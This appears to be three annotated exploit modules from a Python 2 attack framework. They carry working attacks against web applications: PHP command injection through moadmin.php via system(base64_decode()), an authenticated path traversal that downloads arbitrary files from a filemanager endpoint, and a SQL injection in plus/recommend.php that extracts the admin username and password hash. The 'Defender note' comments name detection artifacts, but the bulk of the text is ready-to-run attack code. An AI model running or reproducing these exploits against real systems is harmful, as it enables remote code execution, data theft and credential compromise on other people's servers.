def exploit(self):
    '''Core exploit routine; the exploitation is carried out in this function.

    Reads remote_host, remote_port, path and command from the module config,
    POSTs a single form field to moadmin.php and reports success purely on an
    HTTP 200 status. Returns True on a 200, False on any other status or on
    any exception (which is logged, not re-raised).
    '''
    Log.Log.info("Lauching the exploition...")
    host = self.get_config("remote_host")
    # Only remote_port is coerced to int here; the other values are used as-is.
    port = int(self.get_config("remote_port"))
    path = self.get_config("path")
    command = self.get_config("command")
    url = "http://%s:%d/%s/moadmin.php?collection=1" % (host, port, path)
    # `str.encode("base64")` is the Python 2 codec form (it yields a newline-
    # terminated string, hence the replace); this block is therefore Python 2 only.
    # Defender note: the POST body pattern `system(base64_decode(` inside the
    # `object` field is the on-the-wire artifact a WAF/IDS rule can key on.
    data = {
        "object": "1;system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", ""))
    }
    Log.Log.info("Url: %s" % (url))
    Log.Log.info("Data: %s" % (data))
    try:
        response = requests.post(url, data=data)
        # Success is decided by status code alone; the response body is only
        # printed for the operator, never inspected.
        if response.status_code == 200:
            Log.Log.success("Exploit success!")
            print("%s" % (color.blue(response.content)))
            return True
        else:
            return False
    except Exception as e:
        # Catch-all: network/encoding errors collapse into one log line and a False.
        Log.Log.error(str(e))
        return False
def exploit(self):
    '''Core exploit routine; the exploitation is carried out in this function.

    Requires an authenticated session: `self.login()` must succeed first, and
    `self.session` is then used for the request. Fetches the configured `file`
    through the filemanager download endpoint, prints the body on an HTTP 200
    and returns True; returns False on login failure, on any non-200 status,
    or on any exception (logged, not re-raised).
    '''
    host = self.get_config("remote_host")
    port = self.get_config("remote_port")
    # NOTE: `file` shadows the Python 2 builtin of the same name.
    file = self.get_config("file")
    if not self.login():
        Log.Log.error("Login failed!")
        return False
    Log.Log.success("Login successful!")
    # The `path` query parameter carries a literal `../../../../..` prefix before
    # the configured file name. Defender note: that traversal sequence in the
    # request log is the observable; server-side canonicalisation of `path` and
    # confining it to the managed directory is the mitigation.
    url = "http://%s:%d/components/filemanager/download.php?path=../../../../..%s&type=undefined" % (
        host, port, file)
    try:
        response = self.session.get(url)
        # Only the status code is checked; a 200 with an error page is still "success".
        if response.status_code == 200:
            Log.Log.success("Exploit success!")
            Log.Log.info(">>>>>> %s <<<<<<" % (file))
            print("%s" % color.blue(response.content))
            return True
        else:
            return False
    except Exception as e:
        # Catch-all: any request error becomes a single log line and a False.
        Log.Log.error(str(e))
        return False
def exploit(self):
    '''Core exploit routine; the exploitation is carried out in this function.

    Sends one GET to plus/recommend.php with a fixed query string, then scrapes
    the first <h2>...</h2> of the response and splits it on a literal
    backslash-pipe into two fields printed as "Username" and "Hash". Returns
    True only when that marker is present and yields exactly two fields;
    returns False on any other status, on a missing/malformed marker, or on
    any exception (logged, not re-raised). Uses Python 2 `print` statements.
    '''
    # NOTE(review): this block calls Log.info directly whereas sibling modules
    # use Log.Log.info — presumably a different import form; verify.
    Log.info("Lauching the exploition...")
    host = self.get_config("remote_host")
    port = self.get_config("remote_port")
    # The query string is a fixed literal; only host/port vary per config.
    # Defender note: `_FILES[type][tmp_name]` carrying SQL keywords wrapped in
    # `/*!50000...*/` comment syntax is the request-level artifact to alert on.
    url = "http://%s:%d/%s" % (host, port, '''plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294''')
    Log.info("Url: %s" % (url))
    try:
        response = requests.get(url)
        if response.status_code == 200:
            # `content` is treated as a str (Python 2 bytes); the substring test
            # below would not work unchanged on Python 3 bytes.
            content = response.content
            if "<h2>" not in content:
                Log.error("Exploit Failed!")
                return False
            # Take the text between the first <h2> and the next </h2>, then split
            # on a literal "\|" (the regex-looking string is not a regex here).
            data = response.content.split("<h2>")[1].split("</h2>")[0].split("\\|")
            if len(data) != 2:
                Log.error("Exploit Failed!")
                return False
            Log.success("Exploit success!")
            username = data[0]
            password = data[1]
            print "%s" % (color.cyan("Username\tHash"))
            print "%s" % (color.blue("%s\t%s" % (username, password)))
            return True
        else:
            return False
    except Exception as e:
        # Catch-all: request errors and the IndexError from a truncated <h2>
        # both collapse into one log line and a False.
        Log.error(str(e))
        return False